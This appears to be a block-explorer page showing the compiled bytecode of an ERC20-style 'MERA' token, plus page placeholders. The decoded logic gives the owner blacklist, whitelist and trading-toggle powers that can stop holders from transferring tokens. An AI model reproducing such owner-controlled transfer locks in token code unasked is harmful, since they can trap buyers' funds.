0x608060405234801561001057600080fd5b506004361061018d5760003560e01c8063868873b0116100e3578063a9059cbb1161008c578063dd62ed3e11610066578063dd62ed3e1461034d578063ee3eb74e14610386578063f2fde38b146103a957600080fd5b8063a9059cbb14610313578063d186ab6a14610326578063d5f394881461033a57600080fd5b806395d89b41116100bd57806395d89b41146102e55780639d181d44146102ed578063a457c2d71461030057600080fd5b8063868873b01461029c578063893d20e8146102af5780638da5cb5b146102d457600080fd5b8063342aa8b51161014557806342966c681161011f57806342966c681461025857806370a082311461026b578063715018a61461029457600080fd5b8063342aa8b51461020d57806339509351146102225780633bbac5791461023557600080fd5b806318160ddd1161017657806318160ddd146101d357806323b872dd146101e5578063313ce567146101f857600080fd5b806306fdde0314610192578063095ea7b3146101b0575b600080fd5b61019a6103bc565b6040516101a79190610eda565b60405180910390f35b6101c36101be366004610f44565b61044e565b60405190151581526020016101a7565b6005545b6040519081526020016101a7565b6101c36101f3366004610f6e565b610465565b60075460405160ff90911681526020016101a7565b61022061021b366004610fba565b6105ae565b005b6101c3610230366004610f44565b61063f565b6101c3610243366004610fed565b60036020526000908152604090205460ff1681565b6101c3610266366004611008565b610675565b6101d7610279366004610fed565b6001600160a01b031660009081526001602052604090205490565b610220610689565b6102206102aa366004610fba565b61069d565b6000546001600160a01b03165b6040516001600160a01b0390911681526020016101a7565b6000546001600160a01b03166102bc565b61019a61072e565b6102206102fb366004611021565b61073d565b6101c361030e366004610f44565b6107ce565b6101c3610321366004610f44565b61081d565b600a546101c390600160a01b900460ff1681565b600a546102bc906001600160a01b031681565b6101d761035b36600461103c565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101c3610394366004610fed565b60046020526000908152604090205460ff1681565b6102206103b7366004610fed565b610905565b6060600980546103cb90611066565b80601f01602080910402602001604051908101604052809291908181526020018280546103f790611066565b80156104445780601f1061041957610100808354040283529160200191610444565b820191906000526020600020905b81548152906001019060200180831161042757829003601f168201915b5050505050905090565b600061045b338484610995565b5060015b92915050565b3360009081526003602052604081205460ff16158061049357503360009081526004602052604090205460ff165b6104d45760405162461bcd60e51b815260206004820152600d60248201526c165bdd48185c99481848189bdd609a1b60448201526064015b60405180910390fd5b600a54600160a01b900460ff16806104fb57503360009081526004602052604090205460ff165b6105475760405162461bcd60e51b815260206004820152601a60248201527f43616e2774207472616e73666572204d45524120746f6b656e7300000000000060448201526064016104cb565b610552848484610aee565b6105a4843361059f85604051806060016040528060288152602001611125602891396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610ca6565b610995565b5060019392505050565b6105b6610cd2565b6001600160a01b03821660009081526003602052604090205481151560ff9091161515036106145760405162461bcd60e51b815260206004820152600b60248201526a139bdd0818da185b99d95960aa1b60448201526064016104cb565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161045b91859061059f9086610d2c565b60006106813383610d3f565b506001919050565b610691610cd2565b61069b6000610e66565b565b6106a5610cd2565b6001600160a01b03821660009081526004602052604090205481151560ff9091161515036107035760405162461bcd60e51b815260206004820152600b60248201526a139bdd0818da185b99d95960aa1b60448201526064016104cb565b6001600160a01b03919091166000908152600460205260409020805460ff1916911515919091179055565b6060600880546103cb90611066565b610745610cd2565b801515600a60149054906101000a900460ff161515036107955760405162461bcd60e51b815260206004820152600b60248201526a139bdd0818da185b99d95960aa1b60448201526064016104cb565b600a8054911515600160a01b027fffffffffffffffffffffff00ffffffffffffffffffffffffffffffffffffffff909216919091179055565b600061045b338461059f8560405180606001604052806025815260200161114d602591393360009081526002602090815260408083206001600160a01b038d1684529091529020549190610ca6565b3360009081526003602052604081205460ff16158061084b57503360009081526004602052604090205460ff165b6108875760405162461bcd60e51b815260206004820152600d60248201526c165bdd48185c99481848189bdd609a1b60448201526064016104cb565b600a54600160a01b900460ff16806108ae57503360009081526004602052604090205460ff165b6108fa5760405162461bcd60e51b815260206004820152601a60248201527f43616e2774207472616e73666572204d45524120746f6b656e7300000000000060448201526064016104cb565b61045b338484610aee565b61090d610cd2565b6001600160a01b0381166109895760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201527f646472657373000000000000000000000000000000000000000000000000000060648201526084016104cb565b61099281610e66565b50565b6001600160a01b038316610a105760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460448201527f726573730000000000000000000000000000000000000000000000000000000060648201526084016104cb565b6001600160a01b038216610a8c5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f20616464726560448201527f737300000000000000000000000000000000000000000000000000000000000060648201526084016104cb565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610b6a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f20616460448201527f647265737300000000000000000000000000000000000000000000000000000060648201526084016104cb565b6001600160a01b038216610be65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201527f657373000000000000000000000000000000000000000000000000000000000060648201526084016104cb565b610c23816040518060600160405280602681526020016110ff602691396001600160a01b0386166000908152600160205260409020549190610ca6565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610c529082610d2c565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610ae19085815260200190565b60008184841115610cca5760405162461bcd60e51b81526004016104cb9190610eda565b505050900390565b6000546001600160a01b0316331461069b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104cb565b6000610d3882846110b6565b9392505050565b6001600160a01b038216610dbb5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360448201527f730000000000000000000000000000000000000000000000000000000000000060648201526084016104cb565b610df8816040518060600160405280602281526020016110dd602291396001600160a01b0385166000908152600160205260409020549190610ca6565b6001600160a01b038316600090815260016020526040902055600554610e1e9082610ece565b6005556040518181526000906001600160a01b038416907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b600080546001600160a01b038381167fffffffffffffffffffffffff0000000000000000000000000000000000000000831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610d3882846110c9565b600060208083528351808285015260005b81811015610f0757858101830151858201604001528201610eeb565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610f3f57600080fd5b919050565b60008060408385031215610f5757600080fd5b610f6083610f28565b946020939093013593505050565b600080600060608486031215610f8357600080fd5b610f8c84610f28565b9250610f9a60208501610f28565b9150604084013590509250925092565b80358015158114610f3f57600080fd5b60008060408385031215610fcd57600080fd5b610fd683610f28565b9150610fe460208401610faa565b90509250929050565b600060208284031215610fff57600080fd5b610d3882610f28565b60006020828403121561101a57600080fd5b5035919050565b60006020828403121561103357600080fd5b610d3882610faa565b6000806040838503121561104f57600080fd5b61105883610f28565b9150610fe460208401610f28565b600181811c9082168061107a57607f821691505b60208210810361109a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561045f5761045f6110a0565b8181038181111561045f5761045f6110a056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212206ae7a0e9fb62583e672cf35c6894ab30a113d9c9fc87c8510a77606842c1e7e364736f6c63430008100033
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.